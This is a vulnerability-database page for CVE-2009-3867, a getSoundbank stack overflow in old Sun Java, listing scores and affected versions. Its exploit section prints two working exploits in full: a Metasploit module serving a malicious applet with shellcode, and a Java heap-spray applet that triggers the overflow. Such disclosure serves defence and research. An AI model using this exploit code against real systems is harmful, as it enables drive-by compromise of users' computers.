CVE-2009-3867 Detail

CVE-2009-3867

CVE Descriptions

Stack-based buffer overflow in the HsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a long file: URL in an argument, aka Bug Id 6854303.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 33315

Publication date : 2009-10-28 23h00 +00:00
Author : Tometzky
EDB Verified : Yes

Exploit Database EDB-ID : 16294

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: java_getsoundbank_bof.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, 'Author' => [ 'kf', # Original PoC/exploit 'jduck' # metasploit version ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2009-3867' ], [ 'OSVDB', '59711' ], [ 'BID', '36881' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, }, 'Targets' => [ =begin No automatic targetting for now ... [ 'J2SE 1.6_16 Automatic', { 'Platform' => ['win', 'linux', 'osx'], 'Arch' => [ARCH_X86, ARCH_PPC] } ], =end [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009' )) end def exploit # load the static jar path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar") fd = File.open(path, "rb") @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, req) # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] else print_status("Unknown target for: #{req.headers['User-Agent']}") end end # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end rmq.each {|addr| @targetcache.delete(addr) } # Request processing if (not req.uri.match(/\.jar$/i)) # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) return end # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end def generate_html(pl) html = <<-EOF <html> <head>  </head> <body> <applet width='100%' height='100%' code='AppletX' archive='JARNAME'> <param name='sc' value='SCODE' /> <param name='np' value='NOPS' /> </applet> </body> </html> EOF # finalize the html jar_name = rand_text_alphanumeric(32) html.gsub!(/JARNAME/, jar_name) # add payload debug_payload = false pload = "" pload << "\xcc" if debug_payload pload << pl if ((pload.length % 4) > 0) pload << rand_text((4 - (pload.length % 4))) end if debug_payload print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) # add nops nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) return html end def generate_applet(cli, req) this_target = nil if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else return '' end else this_target = target end return @jar_data end end

Exploit Database EDB-ID : 33316

Publication date : 2009-10-28 23h00 +00:00
Author : Tometzky
EDB Verified : Yes

source: https://www.securityfocus.com/bid/36881/info Sun has released updates to address multiple security vulnerabilities in Java SE. Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible. These issues are addressed in the following releases: JDK and JRE 6 Update 17 JDK and JRE 5.0 Update 22 SDK and JRE 1.4.2_24 SDK and JRE 1.3.1_27 */ import javax.sound.midi.*; import java.io.*; import java.net.*; import java.awt.Graphics; public class test extends java.applet.Applet { public static Synthesizer synth; Soundbank soundbank; public void init() { String fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581 Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13- b05-237) // heap sprayed info starts at 0x25580000+12 but keep in mind we need to be fairly ascii safe. // 0x20 is not usable byte[] frame = { (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp (byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx }; String mal = new String(frame); //System.out.println(mal); fName = "file://" + fName + mal; try { synth = MidiSystem.getSynthesizer(); synth.open(); System.out.println("Spray heap\n"); String shellcode = "\u41424344" + repeat('\u9090',1000) + "\u30313233"; // This is just a nop sled with some heading and trailing markers. int mb = 1024; // Sotirov / Dowd foo follows. // http://taossa.com/archive/bh08sotirovdowd.pdf // Limit the shellcode length to 100KB if (shellcode.length() > 100*1024) { throw new RuntimeException(); } // Limit the heap spray size to 1GB, even though in practice the Java // heap for an applet is limited to 100MB if (mb > 1024) { throw new RuntimeException(); } // Array of strings containing shellcode String[] mem = new String[1024]; // A buffer for the nop slide and shellcode StringBuffer buffer = new StringBuffer(1024*1024/2); // Each string takes up exactly 1MB of space // // header nop slide shellcode NULL // 12 bytes 1MB-12-2-x x bytes 2 bytes // Build padding up to the first exception. We will need to set the eax address after this padding // First usable addresses begin at 0x25580000+0x2121. Unfortunately 0x20 in our addresses caused issues. // 0x2121 is 8481 in decimal, we subtract a few bytes for munging. for (int i = 1; i < (8481/2)-4; i++) { buffer.append('\u4848'); } // (gdb) x/10a 0x25582122-4 // 0x2558211e: 0x48484848 0x20202020 0x20202020 0x20202020 // 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020 // 0x2558213e: 0x20202020 0x20202020 // Set the call address // 0x188fd81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>: call *0x2a8(%eax) buffer.append('\u2122'); buffer.append('\u2558'); // 0x2a8 is 680 in decimal, once again we need filler for making this a usable address location. for (int i = 1; i < (680/2)-1; i++) { buffer.append('\u4848'); } // where do we wanna go? 0x25582525 is right in the middle of the following nop sled // (gdb) x/5x 0x25582525 // 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090 // 0x25582535: 0x90909090 buffer.append('\u2525'); buffer.append('\u2558'); // We are gonna place the shellcode after this so simply fill in remaining space with nops! for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++) { buffer.append('\u9090'); } // Append the shellcode buffer.append(shellcode); // Run the garbage collector Runtime.getRuntime().gc(); // Fill the heap with copies of the string try { for (int i=0; i<mb; i++) { mem[i] = buffer.toString(); } } catch (OutOfMemoryError err) { // do nothing } // Trigger the stack overflow. synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName))); } catch(Exception e) { System.out.println(e); } } public void paint(Graphics g) { g.drawString("Hello pwned!", 50, 25); } public static String repeat(char c,int i) { String tst = ""; for(int j = 0; j < i; j++) { tst = tst+c; } return tst; } }

Products Mentioned

Configuraton 0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Configuraton 0

Sun>>Jre >> Version 1.4.2_1

Sun>>Jre >> Version 1.4.2_1 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_2

Sun>>Jre >> Version 1.4.2_2 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_02

Sun>>Jre >> Version 1.4.2_02 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_03

Sun>>Jre >> Version 1.4.2_03 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_3

Sun>>Jre >> Version 1.4.2_3 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_4

Sun>>Jre >> Version 1.4.2_4 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_04

Sun>>Jre >> Version 1.4.2_04 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_05

Sun>>Jre >> Version 1.4.2_05 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_5

Sun>>Jre >> Version 1.4.2_5 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_06

Sun>>Jre >> Version 1.4.2_06 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_6

Sun>>Jre >> Version 1.4.2_6 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_7

Sun>>Jre >> Version 1.4.2_7 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_07

Sun>>Jre >> Version 1.4.2_07 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_8

Sun>>Jre >> Version 1.4.2_8 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_08

Sun>>Jre >> Version 1.4.2_08 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_09

Sun>>Jre >> Version 1.4.2_09 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_9

Sun>>Jre >> Version 1.4.2_9 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_10

Sun>>Jre >> Version 1.4.2_10 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_11

Sun>>Jre >> Version 1.4.2_11 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_12

Sun>>Jre >> Version 1.4.2_12 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_13

Sun>>Jre >> Version 1.4.2_13 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_14

Sun>>Jre >> Version 1.4.2_14 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_15

Sun>>Jre >> Version 1.4.2_15 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_16

Sun>>Jre >> Version 1.4.2_16 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_17

Sun>>Jre >> Version 1.4.2_17 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_18

Sun>>Jre >> Version 1.4.2_18 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_19

Sun>>Jre >> Version 1.4.2_19 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_20

Sun>>Jre >> Version 1.4.2_20 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_21

Sun>>Jre >> Version 1.4.2_21 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_22

Sun>>Jre >> Version 1.4.2_22 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_01

Sun>>Sdk >> Version 1.4.2_01 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_1

Sun>>Sdk >> Version 1.4.2_1 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_2

Sun>>Sdk >> Version 1.4.2_2 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_02

Sun>>Sdk >> Version 1.4.2_02 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_03

Sun>>Sdk >> Version 1.4.2_03 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_3

Sun>>Sdk >> Version 1.4.2_3 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_04

Sun>>Sdk >> Version 1.4.2_04 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_4

Sun>>Sdk >> Version 1.4.2_4 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_5

Sun>>Sdk >> Version 1.4.2_5 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_05

Sun>>Sdk >> Version 1.4.2_05 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_6

Sun>>Sdk >> Version 1.4.2_6 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_06

Sun>>Sdk >> Version 1.4.2_06 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_07

Sun>>Sdk >> Version 1.4.2_07 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_7

Sun>>Sdk >> Version 1.4.2_7 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_8

Sun>>Sdk >> Version 1.4.2_8 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_08

Sun>>Sdk >> Version 1.4.2_08 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_09

Sun>>Sdk >> Version 1.4.2_09 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_9

Sun>>Sdk >> Version 1.4.2_9 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_10

Sun>>Sdk >> Version 1.4.2_10 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_11

Sun>>Sdk >> Version 1.4.2_11 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_12

Sun>>Sdk >> Version 1.4.2_12 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_13

Sun>>Sdk >> Version 1.4.2_13 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_14

Sun>>Sdk >> Version 1.4.2_14 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_15

Sun>>Sdk >> Version 1.4.2_15 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_16

Sun>>Sdk >> Version 1.4.2_16 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_17

Sun>>Sdk >> Version 1.4.2_17 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_18

Sun>>Sdk >> Version 1.4.2_18 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_19

Sun>>Sdk >> Version 1.4.2_19 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_20

Sun>>Sdk >> Version 1.4.2_20 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_21

Sun>>Sdk >> Version 1.4.2_21 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_22

Sun>>Sdk >> Version 1.4.2_22 (Open CPE detail)

Sun>>Solaris >> Version *

Sun>>Solaris >> Version - (Open CPE detail)
Sun>>Solaris >> Version 1.0 (Open CPE detail)
Sun>>Solaris >> Version 1.0.1 (Open CPE detail)
Sun>>Solaris >> Version 1.1 (Open CPE detail)
Sun>>Solaris >> Version 1.1.1a (Open CPE detail)
Sun>>Solaris >> Version 1.1.2 (Open CPE detail)
Sun>>Solaris >> Version 1.1.3 (Open CPE detail)
Sun>>Solaris >> Version 1.1.4 (Open CPE detail)
Sun>>Solaris >> Version 1.1c (Open CPE detail)
Sun>>Solaris >> Version 1.2 (Open CPE detail)
Sun>>Solaris >> Version 2.0 (Open CPE detail)
Sun>>Solaris >> Version 2.1 (Open CPE detail)
Sun>>Solaris >> Version 2.2 (Open CPE detail)
Sun>>Solaris >> Version 2.3 (Open CPE detail)
Sun>>Solaris >> Version 2.4 (Open CPE detail)
Sun>>Solaris >> Version 2.5 (Open CPE detail)
Sun>>Solaris >> Version 2.5.1 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.7 (Open CPE detail)
Sun>>Solaris >> Version 2.8 (Open CPE detail)
Sun>>Solaris >> Version 4.1.1 (Open CPE detail)
Sun>>Solaris >> Version 4.1.2 (Open CPE detail)
Sun>>Solaris >> Version 4.1.3 (Open CPE detail)
Sun>>Solaris >> Version 4.1.3 (Open CPE detail)
Sun>>Solaris >> Version 5.3 (Open CPE detail)
Sun>>Solaris >> Version 5.4 (Open CPE detail)
Sun>>Solaris >> Version 5.5 (Open CPE detail)
Sun>>Solaris >> Version 5.5.1 (Open CPE detail)
Sun>>Solaris >> Version 5.6 (Open CPE detail)
Sun>>Solaris >> Version 5.8 (Open CPE detail)
Sun>>Solaris >> Version 5.9 (Open CPE detail)
Sun>>Solaris >> Version 7.0 (Open CPE detail)
Sun>>Solaris >> Version 8 (Open CPE detail)
Sun>>Solaris >> Version 8.0 (Open CPE detail)
Sun>>Solaris >> Version 8.1 (Open CPE detail)
Sun>>Solaris >> Version 8.2 (Open CPE detail)
Sun>>Solaris >> Version 9 (Open CPE detail)
Sun>>Solaris >> Version 9.0 (Open CPE detail)
Sun>>Solaris >> Version 9.0 (Open CPE detail)
Sun>>Solaris >> Version 9.1 (Open CPE detail)
Sun>>Solaris >> Version 10 (Open CPE detail)
Sun>>Solaris >> Version 10.0 (Open CPE detail)
Sun>>Solaris >> Version 10.0 (Open CPE detail)
Sun>>Solaris >> Version 11 (Open CPE detail)
Sun>>Solaris >> Version 11.0 (Open CPE detail)

Configuraton 0

Sun>>Jre >> Version 1.3.1_1

Sun>>Jre >> Version 1.3.1_01

Sun>>Jre >> Version 1.3.1_01a

Sun>>Jre >> Version 1.3.1_02

Sun>>Jre >> Version 1.3.1_2

Sun>>Jre >> Version 1.3.1_2 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_03

Sun>>Jre >> Version 1.3.1_03 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_03 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_03 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_03 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_3

Sun>>Jre >> Version 1.3.1_4

Sun>>Jre >> Version 1.3.1_04

Sun>>Jre >> Version 1.3.1_04 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_05

Sun>>Jre >> Version 1.3.1_05 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_05 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_05 (Open CPE detail)
Sun>>Jre >> Version 1.3.1_05 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_5

Sun>>Jre >> Version 1.3.1_06

Sun>>Jre >> Version 1.3.1_06 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_6

Sun>>Jre >> Version 1.3.1_07

Sun>>Jre >> Version 1.3.1_07 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_7

Sun>>Jre >> Version 1.3.1_8

Sun>>Jre >> Version 1.3.1_08

Sun>>Jre >> Version 1.3.1_08 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_9

Sun>>Jre >> Version 1.3.1_09

Sun>>Jre >> Version 1.3.1_09 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_10

Sun>>Jre >> Version 1.3.1_10 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_11

Sun>>Jre >> Version 1.3.1_11 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_12

Sun>>Jre >> Version 1.3.1_12 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_13

Sun>>Jre >> Version 1.3.1_13 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_14

Sun>>Jre >> Version 1.3.1_14 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_15

Sun>>Jre >> Version 1.3.1_15 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_16

Sun>>Jre >> Version 1.3.1_16 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_17

Sun>>Jre >> Version 1.3.1_17 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_18

Sun>>Jre >> Version 1.3.1_18 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_19

Sun>>Jre >> Version 1.3.1_19 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_20

Sun>>Jre >> Version 1.3.1_20 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_21

Sun>>Jre >> Version 1.3.1_21 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_22

Sun>>Jre >> Version 1.3.1_22 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_23

Sun>>Jre >> Version 1.3.1_23 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_24

Sun>>Jre >> Version 1.3.1_24 (Open CPE detail)

Sun>>Jre >> Version 1.3.1_25

Sun>>Jre >> Version 1.3.1_25 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_01

Sun>>Sdk >> Version 1.3.1_01 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_01a

Sun>>Sdk >> Version 1.3.1_01a (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_2

Sun>>Sdk >> Version 1.3.1_02

Sun>>Sdk >> Version 1.3.1_02 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_03

Sun>>Sdk >> Version 1.3.1_03 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_3

Sun>>Sdk >> Version 1.3.1_4

Sun>>Sdk >> Version 1.3.1_04

Sun>>Sdk >> Version 1.3.1_04 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_5

Sun>>Sdk >> Version 1.3.1_05

Sun>>Sdk >> Version 1.3.1_05 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_6

Sun>>Sdk >> Version 1.3.1_06

Sun>>Sdk >> Version 1.3.1_06 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_7

Sun>>Sdk >> Version 1.3.1_07

Sun>>Sdk >> Version 1.3.1_07 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_8

Sun>>Sdk >> Version 1.3.1_08

Sun>>Sdk >> Version 1.3.1_08 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_9

Sun>>Sdk >> Version 1.3.1_09

Sun>>Sdk >> Version 1.3.1_09 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_10

Sun>>Sdk >> Version 1.3.1_10 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_11

Sun>>Sdk >> Version 1.3.1_11 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_12

Sun>>Sdk >> Version 1.3.1_12 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_13

Sun>>Sdk >> Version 1.3.1_13 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_14

Sun>>Sdk >> Version 1.3.1_14 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_15

Sun>>Sdk >> Version 1.3.1_15 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_16

Sun>>Sdk >> Version 1.3.1_16 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_17

Sun>>Sdk >> Version 1.3.1_17 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_18

Sun>>Sdk >> Version 1.3.1_18 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_19

Sun>>Sdk >> Version 1.3.1_19 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_20

Sun>>Sdk >> Version 1.3.1_20 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_21

Sun>>Sdk >> Version 1.3.1_21 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_22

Sun>>Sdk >> Version 1.3.1_22 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_23

Sun>>Sdk >> Version 1.3.1_23 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_24

Sun>>Sdk >> Version 1.3.1_24 (Open CPE detail)

Sun>>Sdk >> Version 1.3.1_25

Sun>>Sdk >> Version 1.3.1_25 (Open CPE detail)

Microsoft>>Windows >> Version *

Microsoft>>Windows >> Version - (Open CPE detail)
Microsoft>>Windows >> Version - (Open CPE detail)
Microsoft>>Windows >> Version - (Open CPE detail)
Microsoft>>Windows >> Version - (Open CPE detail)
Microsoft>>Windows >> Version 1.0 (Open CPE detail)
Microsoft>>Windows >> Version 2.0 (Open CPE detail)
Microsoft>>Windows >> Version 3.0 (Open CPE detail)
Microsoft>>Windows >> Version 3.1 (Open CPE detail)
Microsoft>>Windows >> Version 3.11 (Open CPE detail)
Microsoft>>Windows >> Version 2000 (Open CPE detail)
Microsoft>>Windows >> Version 2000 (Open CPE detail)
Microsoft>>Windows >> Version server_2008 (Open CPE detail)
Microsoft>>Windows >> Version server_2008 (Open CPE detail)
Microsoft>>Windows >> Version server_2008 (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)
Microsoft>>Windows >> Version vista (Open CPE detail)

Configuraton 0

Sun>>Java_se >> Version *

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

